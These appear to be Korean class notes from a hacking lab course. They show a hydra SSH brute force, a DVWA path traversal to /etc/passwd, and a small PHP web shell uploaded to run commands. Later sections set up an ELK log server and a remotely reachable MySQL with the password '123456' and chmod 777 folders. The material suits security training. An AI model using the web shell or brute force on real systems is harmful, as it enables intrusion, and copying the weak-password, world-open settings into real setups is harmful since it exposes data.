ssh 125.246.95.152 (-> kali로 접속하겠다~상대가 kali 없으면 접속이 안된다.)
사용자를 찾아서 접속하면 수월해진다.

ubuntu는 루트 접속 불가능(대부분 취약하지 않도록 접속 불가 설정이 되어있다.)
루트 접속 가능 여부 확인해보기
sudo nano /etc/ssh/sshd_config
#Authentication:
#PermitRootLogin prohibit-password (루트 접속 안되게 막아둠)

=> 따라서 해커는 루트로 들어갈 수 있는 일반 계정을 찾으려고 할 것이다.

[kali]
cat users.txt
cat passwd.txt

cd /home/kali
hydra -L user.txt -P passwd.txt st.kr ssh
    user.txt, passwd.txt 수정

ssh master@st.kr

adduser word
adduser dvwa
adduser web1
adduser web2

위처럼 생성시 cat /etc/passwd 에 유저 저장됨(루트 권한 확인 가능)

security level > low

command injection
    왼쪽 하단에 low 확인

-----------------------------------------------------
예시사례 : KISC 자체 개발 홈페이지의 취약점을 이용한 변조사고 분석
get
bshell등을 사용한 사례

취약점1
php.ini "allow_url_fopen=on"으로 설정
취약점2
awstat.pl에 존재하는 취약점 이용
백도어?

변조된 이후로 전체 시스템 로그가 삭제되어 있어 시스템 로그에서 특이점 발견 불가능했다.
=> 로그관리의 중요성
-----------------------------------------------------

su dvwa
cd public_html
cd vulnerabilities
cd fi
ls
file1,2,3,4 확인

cd .. 을 몇 번 해야 etc에 도달하는지 확인
5번
../../../../..//etc/passwd


3. file upload 공격

cd /home/kali
nano attack.php
kali
< ?php
    $cmd = $_GET["cmd"];
    $result =system($cmd);
    echo "< br>";
    echo "< hr>";
    echo $result;
?>

file upload > browse > /home/attack.php 선택

*쓰기권한 주기
cd home/dvwa/public_html/hackable/uploads
chmod 777 uploads
cd home/dvwa/public_html/config
chmod 777 config

업로드 위치 확인후 접속해보기
http://dvwa.st.kr/hackable/uploads/ 연결됨

=> http://dvwa.st.kr/hackable/uploads/attack.php?cmd=cat /etc/passwd 실행

[selk] 아이피 10.0.2.3 설정
nano /etc/netplan/50-cloud-init.yaml *
network:
  version: 2
  ethernets:
    enp0s3:
       dhcp4: no
       addresses: [10.0.2.3/24] (맘대로)
       gateway4: 10.0.2.2 (utm)
       nameservers:
          addresses: [10.0.2.15] (도메인=네임서버)
sudo netplan apply

cat /etc/*release* (버전확인 24.10)

버전 22로 다운그레이드 하고 selk 재설치하기(DAY13)
추가 설치내용
sudo apt -y install default-jre
sudo apt -y install default-jdk
sudo apt -y install nginx

curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch |sudo gpg --dearmor -o /usr/share/keyrings/elastic.gpg
echo "deb [signed-by=/usr/share/keyrings/elastic.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update
sudo apt -y install elasticsearch
    /etc/elasticsearch/elasticsearch.yml

sudo systemctl start elasticsearch
sudo systemctl enable elasticsearch
curl -X GET "localhost:9200"

sudo apt -y install kibana
sudo systemctl start kibana
sudo systemctl enable kibana

*syslog 데이터베이스 설정
로그를 데이터베이스로 볼 수 있도록 해보자

mysql
show Syslog;
use Syslog;
show tables;
select * from SystemEvents;
select FromHost,Message from SystemEvents limit 0, 10;

[3server]
nano /etc/rsyslog.d/50-default.conf
    target="10.0.2.3"으로 변경
netstat -ant | grep 514
    10.0.2.15와 10.0.2.3:514 ESTABLISHED면 연결된 것
systemctl restart rsyslog

[WIN7]
MYSQL 워크벤치
    [10.0.2.3]
    172.16.0.1 >오른쪽 마우스 > SERVER connections 수정
    10.0.2.3/rslslog/Syslog/123456
    => 원래 db는 외부접속이 허용이 안돼있으므로 연결이 안됨
    db를 열려면 2단계를 거쳐야함
    [selk]
    1. 데이터베이스에 아이피 설정해주기
    mysql
    create database rsyslog;
    create user rsyslog@'192.168.0.3' identified by '123456';
    grant all on Syslog. * to rsyslog@'192.168.0.3';
    flush privileges;

    mysql
    create database rsyslog;
    create user rsyslog@'%' identified by '123456';
    grant all on Syslog. * to rsyslog@'%';
    flush privileges;
    2. nano /etc/mysql/mariadb.conf.d/50-server.cnf
       127.0.0.1 수정 > 0.0.0.0
    systemctl restart mysql

    => 워크벤치 연결됨

    [10.0.2.15]
    위와 동일하게 설정

    경로
    nano /etc/mysql/mysql.conf.d/mysqld.cnf
    127.0.0.1 수정 > 0.0.0.0
    127.0.0.1 수정 > 0.0.0.0